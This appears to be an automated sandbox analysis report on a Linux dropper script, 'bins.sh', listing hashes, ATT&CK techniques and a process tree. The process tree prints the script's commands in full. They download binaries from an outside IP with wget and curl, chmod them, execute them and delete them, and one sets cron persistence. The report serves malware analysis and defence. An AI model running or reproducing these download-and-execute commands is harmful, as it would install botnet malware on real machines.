baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d

Analysis

max time kernel
42s
max time network
51s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
31-10-2024 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

add9df3fe0956071f11080084a31bdeb
SHA1

f7ae02765b04a8c8e2a9f9c67fe20acd4516fd05
SHA256

baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d
SHA512

2e6bd72689deb04f699f94d15949886de251783f5e5c037cd76647fc10b6777f1c7fa1659fbec5e824ef0427e152a3879744edfceed370b4a3213d41749cc84c
SSDEEP

96:9aG1ai9mSxkvymsIWTbbSb2bNbUb0bRG+aG1ai0SM9SvVkT7kmiec+vobbSb2bNj:7xkvymsIWTPK7GX

Score

7^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

767 chmod
785 chmod
816 chmod
823 chmod
829 chmod
843 chmod
774 chmod
794 chmod
809 chmod
836 chmod
851 chmod

pid	process
767	chmod
785	chmod
816	chmod
823	chmod
829	chmod
843	chmod
774	chmod
794	chmod
809	chmod
836	chmod
851	chmod

Executes dropped EXE 11 IoCs

Processes:

tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEeIUGjQGP9j20LhOTC222fZIrfyOuPYtk9iReBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLsOYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJbzsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThVZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQKDBDhSt7ce4AH4R76TedzosCU6IiiU2hJdPdEZ8264siDtS3uUhD7KAvI2T1jba3WR13OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoENFPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk

ioc	pid	process
/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	768	tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	775	IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	786	eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	795	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb	810	OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV	817	zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ	824	ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd	830	KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13	837	PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN	844	OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
/tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk	852	FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk

Renames itself 1 IoCs

Processes:

7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs

pid process

796 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.NnUaM2 crontab
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
796	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.NnUaM2	crontab

Checks CPU configuration 1 TTPs 11 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLscurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/18/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/26/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/269/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/283/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/777/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/814/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/1/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/841/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/660/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/168/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/27/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/322/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/595/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/806/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/822/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/4/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/7/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/13/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/19/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/850/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/43/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/303/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/313/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/828/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/22/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/815/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/821/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/9/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/653/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/808/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/23/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/81/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/112/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/599/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/601/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/802/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/803/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/20/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/41/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/216/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/280/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/807/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/2/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/3/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/11/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/848/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/42/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/305/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/654/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/801/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/847/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/826/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/840/cmdline	7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQrmwgetcurlbusybox

pid process

824 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
825 rm
820 wget
821 curl
822 busybox

pid	process
824	ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
825	rm
820	wget
821	curl
822	busybox

Writes file to tmp directory 19 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxbusyboxwgetbusyboxwgetwgetwgetcurlbusyboxcurlcurlbusyboxbusybox

description	ioc	process
File opened for modification	/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	curl
File opened for modification	/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	busybox
File opened for modification	/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ	busybox
File opened for modification	/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13	busybox
File opened for modification	/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	busybox
File opened for modification	/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb	busybox
File opened for modification	/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV	busybox
File opened for modification	/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN	busybox
File opened for modification	/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	wget
File opened for modification	/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	busybox
File opened for modification	/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	wget
File opened for modification	/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj	wget
File opened for modification	/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	wget
File opened for modification	/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs	curl
File opened for modification	/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd	busybox
File opened for modification	/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe	curl
File opened for modification	/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	curl
File opened for modification	/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR	busybox
File opened for modification	/tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:656

/bin/rm
/bin/rm bins.sh
2⤵
PID:659

/usr/bin/wget
wget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Writes file to tmp directory
PID:662

/usr/bin/curl
curl -O http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Writes file to tmp directory
PID:766

/bin/chmod
chmod 777 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- File and Directory Permissions Modification
PID:767

/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
./tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
- Executes dropped EXE
PID:768

/bin/rm
rm tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe
2⤵
PID:770

/usr/bin/wget
wget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Writes file to tmp directory
PID:771

/usr/bin/curl
curl -O http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:772

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Writes file to tmp directory
PID:773

/bin/chmod
chmod 777 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- File and Directory Permissions Modification
PID:774

/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
./IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
- Executes dropped EXE
PID:775

/bin/rm
rm IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR
2⤵
PID:778

/usr/bin/wget
wget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Writes file to tmp directory
PID:779

/usr/bin/curl
curl -O http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Writes file to tmp directory
PID:781

/bin/chmod
chmod 777 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- File and Directory Permissions Modification
PID:785

/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
./eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
- Executes dropped EXE
PID:786

/bin/rm
rm eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj
2⤵
PID:788

/usr/bin/wget
wget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Writes file to tmp directory
PID:789

/usr/bin/curl
curl -O http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Writes file to tmp directory
PID:793

/bin/chmod
chmod 777 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- File and Directory Permissions Modification
PID:794

/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
./7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:795

/bin/sh
sh -c "crontab -l"
3⤵
PID:797

/usr/bin/crontab
crontab -l
4⤵
PID:798

/bin/sh
sh -c "crontab -"
3⤵
PID:799

/usr/bin/crontab
crontab -
4⤵
- Creates/modifies Cron job
PID:800

/bin/rm
rm 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs
2⤵
PID:802

/usr/bin/wget
wget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
PID:806

/usr/bin/curl
curl -O http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- Checks CPU configuration
PID:807

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- Writes file to tmp directory
PID:808

/bin/chmod
chmod 777 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- File and Directory Permissions Modification
PID:809

/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
./OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
- Executes dropped EXE
PID:810

/bin/rm
rm OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb
2⤵
PID:812

/usr/bin/wget
wget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
PID:813

/usr/bin/curl
curl -O http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- Checks CPU configuration
PID:814

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- Writes file to tmp directory
PID:815

/bin/chmod
chmod 777 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- File and Directory Permissions Modification
PID:816

/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
./zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
- Executes dropped EXE
PID:817

/bin/rm
rm zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV
2⤵
PID:819

/usr/bin/wget
wget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- System Network Configuration Discovery
PID:820

/usr/bin/curl
curl -O http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- Checks CPU configuration
- System Network Configuration Discovery
PID:821

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:822

/bin/chmod
chmod 777 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- File and Directory Permissions Modification
PID:823

/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
./ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:824

/bin/rm
rm ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ
2⤵
- System Network Configuration Discovery
PID:825

/usr/bin/wget
wget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
PID:826

/usr/bin/curl
curl -O http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:827

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- Writes file to tmp directory
PID:828

/bin/chmod
chmod 777 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- File and Directory Permissions Modification
PID:829

/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
./KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
- Executes dropped EXE
PID:830

/bin/rm
rm KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd
2⤵
PID:832

/usr/bin/wget
wget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
PID:833

/usr/bin/curl
curl -O http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:834

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
- Writes file to tmp directory
PID:835

/bin/chmod
chmod 777 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
- File and Directory Permissions Modification
PID:836

/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
./PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
- Executes dropped EXE
PID:837

/bin/rm
rm PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13
2⤵
PID:839

/usr/bin/wget
wget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
PID:840

/usr/bin/curl
curl -O http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:841

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
- Writes file to tmp directory
PID:842

/bin/chmod
chmod 777 OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
- File and Directory Permissions Modification
PID:843

/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
./OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
- Executes dropped EXE
PID:844

/bin/rm
rm OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN
2⤵
PID:845

/usr/bin/wget
wget http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk
2⤵
PID:846

/usr/bin/curl
curl -O http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk
2⤵
- Checks CPU configuration
- Reads runtime system information
PID:847

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk
2⤵
- Writes file to tmp directory
PID:848

/bin/chmod
chmod 777 FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk
2⤵
- File and Directory Permissions Modification
PID:851

/tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk
./FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk
2⤵
- Executes dropped EXE
PID:852

/bin/rm
rm FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk
2⤵
PID:854

/usr/bin/wget
wget http://87.120.84.230/bins/ukCxyo9fEPuo5XqcvU7Er8CjOVv98wwGsw
2⤵
PID:855

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs

Filesize
100KB

MD5
3b78bb645b81d600c30713d416f666be

SHA1
23796112f2cce2afb2217498b5ecf2801ab550f2

SHA256
d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

SHA512
9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

Download Submit
/tmp/FPZZme5q6oH8JjnAv6sc7WUuAUyKFtxIYk

Filesize
88KB

MD5
e9e5d79acad49bbe6c77df0385ec77aa

SHA1
53bbc8b58873cf3117743fab15bd5508421370eb

SHA256
a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd

SHA512
828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381

Download Submit
/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR

Filesize
84KB

MD5
64ece99ca4ab1c1405f5a3335d64a960

SHA1
b7395f2320a5bdadb78943b268708965cdbd1d74

SHA256
aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

SHA512
bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

Download Submit
/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd

Filesize
129KB

MD5
54bec959d900ad930dc662f8092da57d

SHA1
9ae7ad9018eeac5aa89bcde68ec683a364ac7d55

SHA256
b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12

SHA512
904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

Download Submit
/tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN

Filesize
158KB

MD5
d8e96e2fdd3c610ec19128e18de5abde

SHA1
10cf691ae9779bfeca8b67e75721d0a6f275e4f9

SHA256
f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b

SHA512
979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

Download Submit
/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb

Filesize
129KB

MD5
52f72bcf31899453b40d37a7cbf55f35

SHA1
6dfca1bd70aad3e88713b02ec1669ba5a792456c

SHA256
ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495

SHA512
be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

Download Submit
/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13

Filesize
93KB

MD5
8fad5e89ce3d2b6159ac2ce2fdf7c084

SHA1
27105a304b9bb7cd8a663d1b4da1d92fd8eea355

SHA256
24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6

SHA512
71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

Download Submit
/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ

Filesize
122KB

MD5
aadb8cc4b6eac7fce760c09262693884

SHA1
b55178ff3605f4bbfc9286d4c8ac445673232217

SHA256
b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843

SHA512
5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

Download Submit
/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj

Filesize
80KB

MD5
22c527269cbd9b42f4ade79f52757efb

SHA1
c2456188a49af93b0d07af2a7cc1346d5be510bd

SHA256
100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97

SHA512
